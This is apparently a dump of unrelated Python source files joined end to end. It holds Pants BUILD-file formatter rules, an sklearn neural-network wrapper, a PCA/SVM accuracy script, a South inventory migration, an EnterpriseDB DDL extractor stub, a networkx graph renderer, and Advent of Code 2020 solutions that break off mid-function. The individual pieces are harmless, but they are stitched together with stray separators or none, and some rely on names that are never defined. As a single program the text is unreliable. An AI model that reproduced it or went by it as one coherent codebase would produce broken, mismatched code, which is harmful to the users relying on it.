async def format_build_file_with_yapf(
    request: FormatWithYapfRequest, yapf: Yapf
) -> RewrittenBuildFile:
    """Run Yapf over one in-memory BUILD file and report whether it changed."""
    input_snapshot = await Get(Snapshot, CreateDigest([request.to_file_content()]))
    yapf_ics = await get_lockfile_interpreter_constraints(yapf)
    result = await _run_yapf(
        YapfRequest.Batch(
            Yapf.options_scope,
            input_snapshot.files,
            partition_metadata=None,
            snapshot=input_snapshot,
        ),
        yapf,
        yapf_ics,
    )
    # Pull this request's file back out of the formatter's output digest.
    output_content = await Get(DigestContents, Digest, result.output.digest)
    formatted_build_file_content = next(fc for fc in output_content if fc.path == request.path)
    build_lines = tuple(formatted_build_file_content.content.decode("utf-8").splitlines())
    change_descriptions = ("Format with Yapf",) if result.did_change else ()
    return RewrittenBuildFile(request.path, build_lines, change_descriptions=change_descriptions)
# ------------------------------------------------------------------------------------------
# Black formatter fixer
# ------------------------------------------------------------------------------------------
class FormatWithBlackRequest(RewrittenBuildFileRequest):
    """Rewriter that formats a BUILD file with Black."""
@rule
async def format_build_file_with_black(
    request: FormatWithBlackRequest, black: Black
) -> RewrittenBuildFile:
    """Run Black over one in-memory BUILD file and report whether it changed."""
    input_snapshot = await Get(Snapshot, CreateDigest([request.to_file_content()]))
    black_ics = await get_lockfile_interpreter_constraints(black)
    result = await _run_black(
        BlackRequest.Batch(
            Black.options_scope,
            input_snapshot.files,
            partition_metadata=None,
            snapshot=input_snapshot,
        ),
        black,
        black_ics,
    )
    # Pull this request's file back out of the formatter's output digest.
    output_content = await Get(DigestContents, Digest, result.output.digest)
    formatted_build_file_content = next(fc for fc in output_content if fc.path == request.path)
    build_lines = tuple(formatted_build_file_content.content.decode("utf-8").splitlines())
    change_descriptions = ("Format with Black",) if result.did_change else ()
    return RewrittenBuildFile(request.path, build_lines, change_descriptions=change_descriptions)
# ------------------------------------------------------------------------------------------
# Rename deprecated target types fixer
# ------------------------------------------------------------------------------------------
class RenameDeprecatedTargetsRequest(DeprecationFixerRequest):
    """Fixer that renames deprecated target types."""
@rule(desc="Check for deprecated target type names", level=LogLevel.DEBUG)
async def maybe_rename_deprecated_targets(
    request: RenameDeprecatedTargetsRequest,
) -> RewrittenBuildFile:
    """Rename deprecated target types in one BUILD file, if any are present."""
    old_bytes = "\n".join(request.lines).encode("utf-8")
    new_content = await Get(
        FixedBUILDFile,
        renamed_targets_rules.RenameTargetsInFileRequest(path=request.path, content=old_bytes),
    )
    # Report a change only when the bytes actually differ.
    return RewrittenBuildFile(
        request.path,
        tuple(new_content.content.decode("utf-8").splitlines()),
        change_descriptions=("Renamed deprecated targets",)
        if old_bytes != new_content.content
        else (),
    )
# ------------------------------------------------------------------------------------------
# Rename deprecated field types fixer
# ------------------------------------------------------------------------------------------
class RenameDeprecatedFieldsRequest(DeprecationFixerRequest):
    """Fixer that renames deprecated field types."""
@rule(desc="Check for deprecated field type names", level=LogLevel.DEBUG)
async def maybe_rename_deprecated_fields(
    request: RenameDeprecatedFieldsRequest,
) -> RewrittenBuildFile:
    """Rename deprecated field types in one BUILD file, if any are present."""
    old_bytes = "\n".join(request.lines).encode("utf-8")
    new_content = await Get(
        FixedBUILDFile,
        renamed_fields_rules.RenameFieldsInFileRequest(path=request.path, content=old_bytes),
    )
    # Report a change only when the bytes actually differ.
    return RewrittenBuildFile(
        request.path,
        tuple(new_content.content.decode("utf-8").splitlines()),
        change_descriptions=("Renamed deprecated fields",)
        if old_bytes != new_content.content
        else (),
    )
def rules():
    """Register the goal's rules plus every built-in BUILD-file rewriter."""
    return (
        *collect_rules(),
        *collect_rules(renamed_fields_rules),
        *collect_rules(renamed_targets_rules),
        *pex.rules(),
        *lockfile.rules(),
        UnionRule(RewrittenBuildFileRequest, RenameDeprecatedTargetsRequest),
        UnionRule(RewrittenBuildFileRequest, RenameDeprecatedFieldsRequest),
        # NB: We want this to come at the end so that running Black or Yapf happens
        # after all our deprecation fixers.
        UnionRule(RewrittenBuildFileRequest, FormatWithBlackRequest),
        UnionRule(RewrittenBuildFileRequest, FormatWithYapfRequest),
    )
|
import numpy as np
from keras.callbacks import Callback
from keras.optimizers import SGD
from sklearn.neural_network import MLPClassifier
from keras.models import Sequential
from keras.layers import Dense
from .BaseModel import BaseModel
from ..utils import YpredCallback
class NN_LinearLinear_Sklearn(BaseModel):
    """2 layer linear-linear neural network using scikit-learn's MLPClassifier.

    (The original docstring claimed Keras, but the implementation builds an
    sklearn `MLPClassifier`.)
    """

    parametric = False
    bootlist = None

    def __init__(self, n_nodes=2, epochs=200, learning_rate=0.01, momentum=0.0, decay=0.0, nesterov=False, loss="binary_crossentropy", batch_size=None, verbose=0):
        self.n_nodes = n_nodes
        self.verbose = verbose
        self.n_epochs = epochs
        self.k = n_nodes
        self.batch_size = batch_size
        self.loss = loss
        self.learning_rate = learning_rate
        self.momentum = momentum
        self.decay = decay
        # Fix: `nesterov` was accepted but never stored, and train() hard-coded
        # nesterovs_momentum=False; store it so train() can forward it. The
        # default (False) keeps the previous behavior for existing callers.
        self.nesterov = nesterov
        self.optimizer = "sgd"

    def train(self, X, Y, epoch_ypred=False, epoch_xtest=None):
        """Fit the neural network model, save additional stats (as attributes) and return Y predicted values.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]
            Predictor variables, where n_samples is the number of samples and n_features is the number of predictors.
        Y : array-like, shape = [n_samples, 1]
            Response variables, where n_samples is the number of samples.

        Returns
        -------
        y_pred_train : array-like, shape = [n_samples, 1]
            Predicted y score for samples.
        """
        # Default to full-batch training when no batch size was given.
        if self.batch_size is None:
            self.batch_size = len(X)
        # Ensure array and error check (inherited from BaseModel).
        X, Y = self.input_check(X, Y)
        self.model = MLPClassifier(hidden_layer_sizes=(self.n_nodes,),
                                   activation='identity',
                                   solver=self.optimizer,
                                   learning_rate_init=self.learning_rate,
                                   momentum=self.momentum,
                                   batch_size=self.batch_size,
                                   nesterovs_momentum=self.nesterov,
                                   max_iter=self.n_epochs)
        # Fit
        self.model.fit(X, Y)
        y_pred_train = self.model.predict(X)
        # Storing X, Y, and Y_pred
        self.Y_pred = y_pred_train
        self.X = X
        self.Y = Y
        return y_pred_train

    def test(self, X, Y=None):
        """Calculate and return Y predicted value.

        Parameters
        ----------
        X : array-like, shape = [n_samples, n_features]
            Test variables, where n_samples is the number of samples and n_features is the number of predictors.

        Returns
        -------
        y_pred_test : array-like, shape = [n_samples, 1]
            Predicted y score for samples.
        """
        y_pred_test = self.model.predict(X)
        return y_pred_test
|
# -*- coding: utf-8 -*-
"""
Created on Fri Nov 30 16:08:57 2018
@author: aadha
"""
import pandas as pd
import os
import numpy as np
from sklearn.model_selection import StratifiedKFold
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score
from sklearn.svm import SVC
def stratified(data, fold):
    """Run *fold*-fold stratified cross-validation of a linear SVM on *data*.

    The last column of *data* is the class label; all other columns are
    features. Returns the mean test accuracy over the folds.
    """
    # Fix: the original passed random_state=42 with shuffle left at its
    # default (False). Old scikit-learn silently ignored it; modern versions
    # raise ValueError. Dropping it preserves the exact fold assignment.
    skf = StratifiedKFold(n_splits=fold)
    X = data.iloc[:, :-1].values
    y = data.iloc[:, -1].values.tolist()
    accuracy = []
    for train_index, test_index in skf.split(X, y):
        X_train, X_test = data.iloc[train_index, :-1].values, data.iloc[test_index, :-1].values
        y_train, y_test = data.iloc[train_index, -1].values.tolist(), data.iloc[test_index, -1].values.tolist()
        """
        # Feature Scaling
        sc = StandardScaler()
        X_train = sc.fit_transform(X_train)
        X_test = sc.transform(X_test)
        """
        # Fit the chosen classifier to the training split.
        classifier = SVC(kernel='linear')
        classifier.fit(X_train, y_train)
        # Predicting the Test set results
        y_pred = classifier.predict(X_test)
        #cm = confusion_matrix(y_test, y_pred)
        accuracy.append(accuracy_score(y_test, y_pred))
    return sum(accuracy) / len(accuracy)
if __name__ == "__main__":
    # NOTE(review): indentation reconstructed from a whitespace-mangled source;
    # the per-dataset accuracy computation is assumed to live inside the loop —
    # confirm against the original file.
    # Load every per-user feature CSV, dropping rows with missing values.
    data = []
    for files in os.listdir('feature'):
        matrix = pd.read_csv(os.path.join('feature', files))
        data.append(matrix.dropna(axis=0))
    PCA_data = []
    for d in data:
        FinalFeatures = []
        label = d.iloc[:, -1].values.tolist()
        dat = d.iloc[:, :-1]
        # Standardize features before PCA (PCA is scale-sensitive).
        X = StandardScaler().fit_transform(dat)
        pca = PCA(n_components=5)
        x_new = pca.fit_transform(X)
        #PCAframe = pd.DataFrame(x_new)
        #PCAframe['label'] = label
        #PCA_data.append(PCAframe)
        # For each of the 5 components, pick the original feature with the
        # largest loading, then append the label column index.
        dum = pca.components_[:5]
        index = []
        for item in dum:
            item = pd.Series(item)
            index.append(item[item == max(item)].index[0])
        index.append(d.shape[1] - 1)
        classificationData = d.iloc[:, index]  #
        accuracy = (stratified(classificationData, 5))
        print("Total accuracy {}".format(accuracy))
    """
    j = 0
    for user in PCA_data:
        print("User {}".format(j+1))
        accuracy = (stratified(user, 5))
        print("Accuracy: {}".format(accuracy))
        j+=1
    """
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration: drops purchase/lost/damage tracking fields from
    the Inventory model. backwards() restores them with their old defaults."""

    def forwards(self, orm):
        """Apply the migration: remove the deprecated Inventory columns."""
        # Deleting field 'Inventory.purchased_date'
        db.delete_column(u'inventory_inventory', 'purchased_date')
        # Deleting field 'Inventory.is_lost'
        db.delete_column(u'inventory_inventory', 'is_lost')
        # Deleting field 'Inventory.is_damaged'
        db.delete_column(u'inventory_inventory', 'is_damaged')
        # Deleting field 'Inventory.lost_date'
        db.delete_column(u'inventory_inventory', 'lost_date')
        # Deleting field 'Inventory.damaged_date'
        db.delete_column(u'inventory_inventory', 'damaged_date')
        # Deleting field 'Inventory.price_currency'
        db.delete_column(u'inventory_inventory', 'price_currency')
        # Deleting field 'Inventory.purchased_from'
        db.delete_column(u'inventory_inventory', 'purchased_from')
        # Deleting field 'Inventory.price'
        db.delete_column(u'inventory_inventory', 'price')

    def backwards(self, orm):
        """Revert the migration: re-add the removed Inventory columns."""
        # Adding field 'Inventory.purchased_date'
        db.add_column(u'inventory_inventory', 'purchased_date',
                      self.gf('django.db.models.fields.DateField')(default=datetime.datetime.now),
                      keep_default=False)
        # Adding field 'Inventory.is_lost'
        db.add_column(u'inventory_inventory', 'is_lost',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)
        # Adding field 'Inventory.is_damaged'
        db.add_column(u'inventory_inventory', 'is_damaged',
                      self.gf('django.db.models.fields.BooleanField')(default=False),
                      keep_default=False)
        # Adding field 'Inventory.lost_date'
        db.add_column(u'inventory_inventory', 'lost_date',
                      self.gf('django.db.models.fields.DateField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'Inventory.damaged_date'
        db.add_column(u'inventory_inventory', 'damaged_date',
                      self.gf('django.db.models.fields.DateField')(null=True, blank=True),
                      keep_default=False)
        # Adding field 'Inventory.price_currency'
        db.add_column(u'inventory_inventory', 'price_currency',
                      self.gf('djmoney.models.fields.CurrencyField')(default='NPR'),
                      keep_default=False)
        # Adding field 'Inventory.purchased_from'
        # NOTE(review): a datetime default on a CharField looks auto-generated by
        # South from an interactive prompt — confirm intent.
        db.add_column(u'inventory_inventory', 'purchased_from',
                      self.gf('django.db.models.fields.CharField')(default=datetime.datetime(2015, 6, 29, 0, 0), max_length=100),
                      keep_default=False)
        # Adding field 'Inventory.price'
        db.add_column(u'inventory_inventory', 'price',
                      self.gf('djmoney.models.fields.MoneyField')(max_digits=8, decimal_places=2, default_currency='NPR'),
                      keep_default=False)

    # Frozen ORM state after this migration (South bookkeeping).
    models = {
        u'inventory.inventory': {
            'Meta': {'object_name': 'Inventory'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.files.ImageField', [], {'default': "''", 'max_length': '1024', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'})
        }
    }

    complete_apps = ['inventory']
#!/usr/bin/env python
###############################################################################
#
# Copyright (c) 2016-2017 EnterpriseDB - All rights reserved.
# Author: Raghavedra Rao
#
# This module validates all the CLI option processed in cli_options module
# and does the sanity check of the values to pass on.
###############################################################################
# Python module
import os
import sys
import re
# DMA module
from templates.misc.dma_regex import *
from templates.cli.cli_args_validator import *
from templates.misc.precheck import *
def get_object_name_from_sqlfile(sqlfile, obj_type):
    """Return the object name parsed from *sqlfile* for the given *obj_type*.

    NOTE: currently a stub that always returns the placeholder name.
    """
    placeholder = 'xyz'
    return placeholder
def extract_ddl_from_sqlfile_and_write_to_file(otype,
                                               sqlfile,
                                               ):
    """Extract one object's DDL section from *sqlfile* into its own .sql file.

    Returns the path of the file written.
    """
    # obj_schema / obj_name / assessment_files_write_location / object_section /
    # logger are presumably provided by the star imports above — TODO confirm.
    obj_tmp_filename = '%s%s_%s_%s.sql' % \
        (assessment_files_write_location,
         obj_schema,
         otype,  # fix: was the undefined name `obj_type`; the parameter is `otype`
         obj_name)
    logger.info("Writing to file...%s" % obj_tmp_filename)
    # Context managers guarantee both handles close even if object_section raises
    # (the original leaked `ofile` on any exception).
    with open(sqlfile, 'r') as f, open(obj_tmp_filename, 'w') as ofile:
        for line in object_section(f):
            ofile.write(line)
    return obj_tmp_filename
|
import json
import networkx as nx
from networkx.readwrite import json_graph
import pandas as pd
from jsm.jsm_analysis import test2
_CODE_TMPL = '*GRAPH_TMPL*'
_BR_TMPL = 'br'
def generate_graph(hypothesis, path, name_reas):
    """Build the hypothesis graph and render it into an HTML page at *path*."""
    # DEFAULT _draw_edges_1()
    G = nx.Graph()
    scale = 2            # space near node
    count_line_reas = 3  # points per line of reasons
    smesh_row = 1        # left margin of next row
    # Nested hypotheses (list of lists) use the two-level layout variant.
    draw_nodes = _draw_nodes2 if isinstance(hypothesis[0], list) else _draw_nodes1
    draw_nodes(G, hypothesis, scale, 8, name_reas, count_line_reas, smesh_row)
    payload = json_graph.node_link_data(G)
    # The front-end template expects the links under an "edges" key.
    payload['edges'] = payload['links']
    payload['links'] = []
    serialized = json.dumps(payload)
    _generate_cause_html(path, serialized)
    print(serialized)
def _generate_cause_html(path, s):
    """Render the cause-graph page by splicing JSON string *s* into the HTML template."""
    # Fix: use context managers so the handles close even when read/write raises
    # (the original leaked both files on any exception).
    with open('gui/templates/cause_template.html') as tmpl:
        # tmpl = open('templates/cause_template.html') # square
        text = tmpl.read()
    # print(text)
    text = text.replace(_CODE_TMPL, s)
    # NOTE(review): the template is read with the platform default encoding while
    # the output is written as UTF-8 — confirm the template is ASCII/UTF-8.
    with open(path, 'w', encoding='utf-8') as dest:
        dest.write(text)
def _draw_nodes2(G, hypothesis, scale, size_node, name_reas, count_line_reas, smesh_row):
    # Lay out one node per distinct reason for a *nested* hypothesis structure
    # (list of lists of hypothesis objects). Edges are added afterwards by
    # _draw_edges_1 from the id sequence accumulated in mas_edge.
    # NOTE(review): indentation reconstructed from a whitespace-mangled source —
    # the placement of the colour-cycling block should be confirmed.
    mas_edge = []    # node id (or None separator) per truthy reason encountered
    mas_reas = []    # reason index (or None) recorded alongside mas_edge
    last_id = 0      # next node id to assign
    count_node = 0   # nodes placed so far (drives row wrapping)
    x_t, y_t = 1 * scale, 1 * scale  # current layout position
    colors = ['green', 'darkred', 'brown', 'yellow', 'blue', 'orange']  # edge palette
    node_colors = ['darkblue', 'purple', 'gray']
    sel_nod_col = 0  # select color for NODES (wraps at 2, so only first two cycle)
    d1 = len(hypothesis)  # count of pairs in hypotheses
    for i in range(d1):
        d2 = len(hypothesis[i])
        for k in range(d2):
            lengmass = len(hypothesis[i][k].value)  # count of reasons
            for j in range(lengmass):
                if hypothesis[i][k].value[j] == True:
                    if mas_reas.count(j) > 0:
                        # Reason j already seen: reuse a previously recorded id.
                        # NOTE(review): mas_edge[j] indexes by reason number, not
                        # position — presumably relies on ids matching j; verify.
                        mas_edge.append(mas_edge[j])
                    else:
                        mas_edge.append(last_id)
                    lab = name_reas[j + 1]  # assumes column 0 is the target label — TODO confirm
                    # lab = 'test'
                    if mas_reas.count(j) < 1:
                        # First appearance: place a new node, wrapping to a new
                        # row every count_line_reas nodes.
                        if (count_node % count_line_reas == 0) & (j > 0):
                            y_t += 2 * scale
                            x_t = smesh_row + 1 * scale
                        G.add_node(last_id, x=x_t, y=y_t, size=size_node, label=lab, color=node_colors[sel_nod_col])  # add node reas
                        last_id += 1
                        x_t += 1 * scale
                        count_node += 1
                    mas_reas.append(j)
                else:
                    # Falsy reason: record a separator so edge drawing restarts.
                    mas_edge.append(None)
                    mas_reas.append(None)
        sel_nod_col += 1
        if sel_nod_col > 1:
            sel_nod_col = 0
    # Compact mas_edge, then re-insert the separators at the positions recorded
    # in mas_reas so the two lists stay aligned.
    num = mas_edge.count(None)
    for i in range(num):
        mas_edge.remove(None)
    for i in range(len(mas_reas)):
        if mas_reas[i] is None:
            mas_edge.insert(i, None)
    _draw_edges_1(G, colors, mas_edge)
    # _draw_edges(G, colors) # next variant of draw grah
def _draw_nodes1(G, hypothesis, scale, size_node, name_reas, count_line_reas, smesh_row):
    # Flat-hypothesis counterpart of _draw_nodes2: one node per distinct reason,
    # with mas_edge accumulating the node-id sequence for edge drawing.
    # NOTE(review): indentation reconstructed from a whitespace-mangled source.
    mas_edge = []    # node id (or None separator) per truthy reason encountered
    mas_reas = []    # reason index (or None) recorded alongside mas_edge
    last_id = 0
    count_node = 0
    x_t, y_t = 1 * scale, 1 * scale
    colors = ['green', 'darkred', 'brown', 'yellow', 'blue', 'orange']
    node_colors = ['darkblue', 'purple', 'gray']
    sel_nod_col = 0  # select color for NODES (wraps at 2, so only first two cycle)
    d1 = len(hypothesis)  # count of pairs in hypotheses
    for i in range(d1):
        lengmass = len(hypothesis[i].value)  # count of reasons
        for j in range(lengmass):
            if hypothesis[i].value[j] == True:
                if mas_reas.count(j) > 0:
                    # NOTE(review): indexes mas_edge by reason number, not
                    # position — presumably relies on ids matching j; verify.
                    mas_edge.append(mas_edge[j])
                else:
                    mas_edge.append(last_id)
                lab = name_reas[j + 1]  # assumes column 0 is the target label — TODO confirm
                # lab = 'test'
                if mas_reas.count(j) < 1:
                    # First appearance: place a new node, wrapping rows.
                    if (count_node % count_line_reas == 0) & (j > 0):
                        y_t += 2 * scale
                        x_t = smesh_row + 1 * scale
                    G.add_node(last_id, x=x_t, y=y_t, size=size_node, label=lab,
                               color=node_colors[sel_nod_col])  # add node reas
                    last_id += 1
                    x_t += 1 * scale
                    count_node += 1
                mas_reas.append(j)
            else:
                mas_edge.append(None)
                mas_reas.append(None)
        sel_nod_col += 1
        if sel_nod_col > 1:
            sel_nod_col = 0
    # Compact mas_edge and re-insert separators at positions recorded in mas_reas.
    num = mas_edge.count(None)
    for i in range(num):
        mas_edge.remove(None)
    for i in range(len(mas_reas)):
        if mas_reas[i] is None:
            mas_edge.insert(i, None)
    _draw_edges_1(G, colors, mas_edge)
    # NOTE(review): unlike _draw_nodes2, BOTH edge-drawing variants run here,
    # adding two edge sets — looks like an unintended leftover; confirm.
    _draw_edges(G, colors, mas_edge)  # next variant of draw grah
def _draw_edges_1(G, colors, mas_edge):
    """Add edges from the id sequence in *mas_edge*.

    Edges fan out from the first node of each None-delimited segment; each
    None separator also advances the edge colour (wrapping after 6).
    """
    color_idx = 0
    src = mas_edge[0]
    dst = mas_edge[1]
    for pos in range(len(mas_edge) - 1):
        if src is not None and dst is not None:
            G.add_edge(src, dst, id=pos, color=colors[color_idx])
            dst = mas_edge[pos + 1]
        else:
            # Segment break: restart at this position with the next colour.
            src = mas_edge[pos]
            dst = mas_edge[pos + 1]
            color_idx = (color_idx + 1) % 6
    _change_node_size(G, mas_edge)
def _draw_edges(G, colors, mas_edge):  # posled draw
    """Alternate edge-drawing variant: chain consecutive nodes of each
    None-delimited segment (rather than fanning out from the first)."""
    select_color = 0
    source = mas_edge[0]
    target = mas_edge[1]
    for i in range(len(mas_edge) - 2):
        if source is None or target is None:
            source = mas_edge[i + 1]
            target = mas_edge[i + 2]
            select_color += 1
            # Fix: wrap the colour index like _draw_edges_1 does; the original
            # raised IndexError after six segment breaks (len(colors) == 6).
            if select_color >= 6:
                select_color = 0
        else:
            G.add_edge(source, target, id=i, color=colors[select_color])
            source = mas_edge[i + 1]
            target = mas_edge[i + 2]
    _change_node_size(G, mas_edge)
def _change_node_size(G, mas_edge):
    """Bucket each node's size by its occurrence count in *mas_edge*.

    Count >= 10 -> size 10, 2..9 -> size 9, 1 -> size 8.
    """
    mas_node_size = []
    for node_id in range(len(mas_edge)):
        degree = mas_edge.count(node_id)
        if degree > 0:
            # Fix: the original indexed mas_node_size[i] by node id, which
            # raises IndexError (or buckets the wrong entry) whenever some id
            # in the range never occurs; bucket the just-computed count instead.
            if degree >= 10:
                mas_node_size.append(10)
            elif degree >= 2:
                mas_node_size.append(9)
            else:
                mas_node_size.append(8)
    for i in range(len(mas_node_size)):
        # NOTE(review): G.node was removed in networkx >= 2.4 (use G.nodes);
        # kept as-is to match the rest of this module.
        G.node[i]['size'] = mas_node_size[i]
    _change_node_color(G, mas_node_size)
def _change_node_color(G, mas_node_size):
    """Colour nodes by their bucketed size: 10 -> darkred, 9 -> yellow, 8 -> green."""
    palette = {10: 'darkred', 9: 'yellow', 8: 'green'}
    for idx, size in enumerate(mas_node_size):
        if size in palette:
            G.node[idx]['color'] = palette[size]
if __name__ == '__main__':
    # Load the example dataset and render its hypothesis graph.
    frame = pd.read_csv('../data/ex1.csv', encoding='cp1251', sep=';', index_col=False, na_values='?')
    name_reas = list(frame.columns.values)
    print(name_reas)
    hypothesis = test2()
    path = 'templates/res.html'
    generate_graph(hypothesis, path, name_reas)
|
#!/usr/bin/env python
# coding: utf-8
# # Advent of Code 2020
#
# This solution (Jupyter notebook; python 3.7) by kannix68, @ 2020-12. \
# Using anaconda distro, conda v4.9.2. installation on MacOS v10.14.6 "Mojave".
# ## Generic AoC code
# In[ ]:
import sys
import logging
import itertools
#from operator import mul
import re
import numpy as np
import lib.aochelper as aoc
from lib.aochelper import map_list as mapl
from lib.aochelper import filter_list as filterl
print("Python version:", sys.version)
print("Version info:", sys.version_info)
log = aoc.getLogger(__name__)
print(f"initial log-level={log.getEffectiveLevel()}")
EXEC_RESOURCE_HOGS = False
EXEC_EXTRAS = False
# ## Problem domain code
# ### Day 1: Report Repair
# In[ ]:
print("Day 1 a")
# In[ ]:
THIS_YEAR = 2020 # "Last christmas, I gave you my heart... this year..." - Wham!
# In[ ]:
test_str = """
1721
979
366
299
675
1456""".strip()
tests = list(map(int, test_str.split("\n")))
log.warning(tests)
# In[ ]:
def solve01a(l, target=2020):
    """Return the product of the two entries of *l* that sum to *target*.

    *target* defaults to 2020 (the module's THIS_YEAR). Fix: returns None
    when no pair matches — the original left `p` unbound and raised
    NameError in that case.
    """
    for combo in itertools.combinations(l, 2):
        v = np.array(combo)  # numpy for elegance, array methods .sum() and .prod()
        if v.sum() == target:
            log.info(f"found {v}")
            p = v.prod()
            log.debug(f"product={p}")
            return p
    return None
# In[ ]:
result = solve01a(tests)
print("tests solution", result)
# In[ ]:
ins = list(map(int, aoc.read_file_to_list('./in/day01.in')))
#ins
# In[ ]:
result = solve01a(ins)
print("Day 1 a solution:", result)
# In[ ]:
def solve01b(l, target=2020):
    """Return the product of the three entries of *l* that sum to *target*.

    *target* defaults to 2020 (the module's THIS_YEAR). Fix: returns None
    when no triple matches — the original left `p` unbound and raised
    NameError in that case.
    """
    for combo in itertools.combinations(l, 3):
        v = np.array(combo)
        if v.sum() == target:
            log.info(f"found {v}")
            p = v.prod()  # np.prod(np.array(v))
            log.debug(f"product={p}")
            return p
    return None
# In[ ]:
print("Day 1 b")
print("test results:", solve01b(tests))
# In[ ]:
print("Day 1 b solution:", solve01b(ins))
# ### Day 2: Password Philosophy
# In[ ]:
print("Day 2 a")
# In[ ]:
test_str = """
1-3 a: abcde
1-3 b: cdefg
2-9 c: ccccccccc
""".strip()
tests = test_str.split("\n")
#tests
# In[ ]:
def solve02a(l):
    """Count passwords whose policy letter occurs within the allowed range.

    Each line looks like "1-3 a: abcde": the letter must occur between
    min and max times (inclusive) in the password.
    """
    ct = 0
    for line in l:
        rules, pwd = line.split(': ')
        bounds, char = rules.split(' ')
        lo, hi = map(int, bounds.split('-'))
        if lo <= pwd.count(char) <= hi:
            ct += 1
    log.debug(f"num of valid passwords={ct}")
    return ct
# In[ ]:
result = solve02a(tests)
print("tests result:", result)
# In[ ]:
ins = aoc.read_file_to_list('./in/day02.in')
print("Day 2 a solution:", solve02a(ins))
# In[ ]:
def solve02b(l):
    """Count passwords where exactly one of the two 1-based positions holds the letter."""
    ct = 0
    for line in l:
        rules, pwd = line.split(': ')
        positions, char = rules.split(' ')
        first, second = map(int, positions.split('-'))
        # Each side is 0 or 1; exactly one position must match.
        matches = pwd[first - 1].count(char) + pwd[second - 1].count(char)
        if matches == 1:
            ct += 1
    log.debug(f"num of valid passwords={ct}")
    return ct
# In[ ]:
print("Day 2 b")
print("assert day 2 b test conditions")
assert( 1 == solve02b([tests[0]]) )
assert( 0 == solve02b([tests[1]]) )
assert( 0 == solve02b([tests[2]]) )
print("assertions were ok.")
# In[ ]:
print("tests result:", solve02b(tests))
# In[ ]:
print("Day 2 b solution:", solve02b(ins))
# ### Day 3: Toboggan Trajectory
# In[ ]:
print("Day 3 a")
# In[ ]:
test_str = """
..##.......
#...#...#..
.#....#..#.
..#.#...#.#
.#...##..#.
..#.##.....
.#.#.#....#
.#........#
#.##...#...
#...##....#
.#..#...#.#
""".strip()
tests = test_str.split("\n")
log.debug(tests)
# In[ ]:
def prepare_input(l):
    """Convert '#'/'.' text rows into rows of 1/0 ints ('#' -> tree -> 1)."""
    return [[1 if ch == '#' else 0 for ch in row] for row in l]
tests = prepare_input(tests)
log.debug(tests)
# In[ ]:
def solve03a(l2d):
    """Count trees hit descending the (cyclic-width) grid with slope right 3, down 1.

    Cleanup: the loop variable no longer shadows the builtin `iter`, and the
    dead `else: iter += 1` (reassigning the loop variable) is removed —
    traversal is unchanged.
    """
    num_rows = len(l2d)
    num_cols = len(l2d[0])
    log.info(f"num rows={num_rows}, cols={num_cols}")
    posx, posy = [0, 0]
    dx, dy = [3, 1]
    ct = 0
    tpath = ''
    for step in range(1, num_rows + 2):
        # The grid repeats horizontally, hence the modulo on the column.
        if l2d[posy][posx % num_cols] == 1:
            ct += 1
            tpath += 'X'
        else:
            tpath += '0'
        posx += dx
        posy += dy
        if posy > num_rows - 1:
            log.debug(f"break at iter#={step}")
            break
    outstr = f"encountered {ct} trees."
    if log.getEffectiveLevel() <= logging.DEBUG:
        outstr += f"Path={tpath}"
    log.info(outstr)
    return ct
# In[ ]:
print("Day 3 a tests:")
print(solve03a(tests))
# In[ ]:
ins = prepare_input(aoc.read_file_to_list('./in/day03.in'))
# In[ ]:
result = solve03a(ins)
print("Day 3 a solution:", result)
# In[ ]:
def solve03b(l2d, vec):
    """Count trees hit descending the grid with slope *vec* = [dx, dy].

    Cleanup: the loop variable no longer shadows the builtin `iter`, and the
    dead `else: iter += 1` is removed — traversal is unchanged.
    """
    num_rows = len(l2d)
    num_cols = len(l2d[0])
    log.debug(f"num rows={num_rows}, cols={num_cols}, vector={vec}")
    posx, posy = [0, 0]
    dx, dy = vec  # reversed(vec)
    ct = 0
    for step in range(0, num_rows + 1):
        # The grid repeats horizontally, hence the modulo on the column.
        if l2d[posy][posx % num_cols] == 1:
            ct += 1
        posx += dx
        posy += dy
        if posy > num_rows - 1:
            log.debug(f"break at iter#={step}")
            break
    log.debug(f"encountered {ct} trees.")
    return ct
# In[ ]:
print("Day 3 b")
#print("number of trees encountered:", solve3b(tests, [3, 1]))
# In[ ]:
print("assert day 3 b test conditions:")
assert( 2 == solve03b(tests, [1, 1]))
assert( 7 == solve03b(tests, [3, 1]))
assert( 3 == solve03b(tests, [5, 1]))
assert( 4 == solve03b(tests, [7, 1]))
assert( 2 == solve03b(tests, [1, 2]))
print("assertions were ok.")
# In[ ]:
p = solve03b(tests, [1, 1]) * solve03b(tests, [3, 1]) * solve03b(tests, [5, 1]) * solve03b(tests, [7, 1]) * solve03b(tests, [1, 2])
print("day 3 b test result (product):", p)
# In[ ]:
p = solve03b(ins, [1, 1]) * solve03b(ins, [3, 1]) * solve03b(ins, [5, 1]) * solve03b(ins, [7, 1]) * solve03b(ins, [1, 2])
print("day 3 b solution (product):", p)
# ### Day 4: Passport Processing
# In[ ]:
fields_mandat = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
fields_opt = {'cid'}
# In[ ]:
test_str = """
ecl:gry pid:860033327 eyr:2020 hcl:#fffffd
byr:1937 iyr:2017 cid:147 hgt:183cm
iyr:2013 ecl:amb cid:350 eyr:2023 pid:028048884
hcl:#cfa07d byr:1929
hcl:#ae17e1 iyr:2013
eyr:2024
ecl:brn pid:760753108 byr:1931
hgt:179cm
hcl:#cfa07d eyr:2025 pid:166559648
iyr:2011 ecl:brn hgt:59in
""".strip()
tests = test_str.split("\n\n")
log.debug(tests)
# In[ ]:
def passport_valid(passport):
    """Return True when *passport* (whitespace-separated key:value entries)
    contains every mandatory field key from the module-level fields_mandat."""
    entries = re.split(r'\s+', passport)
    log.debug(entries)
    fields = [entry.split(':')[0] for entry in entries]
    #log.debug(sorted(fields))
    b = fields_mandat.issubset(fields)
    log.debug(f"valid?: {b}")
    return b
# In[ ]:
def solve04a(passports):
    """Count passports that contain all mandatory fields."""
    ct = sum(1 for passport in passports if passport_valid(passport))
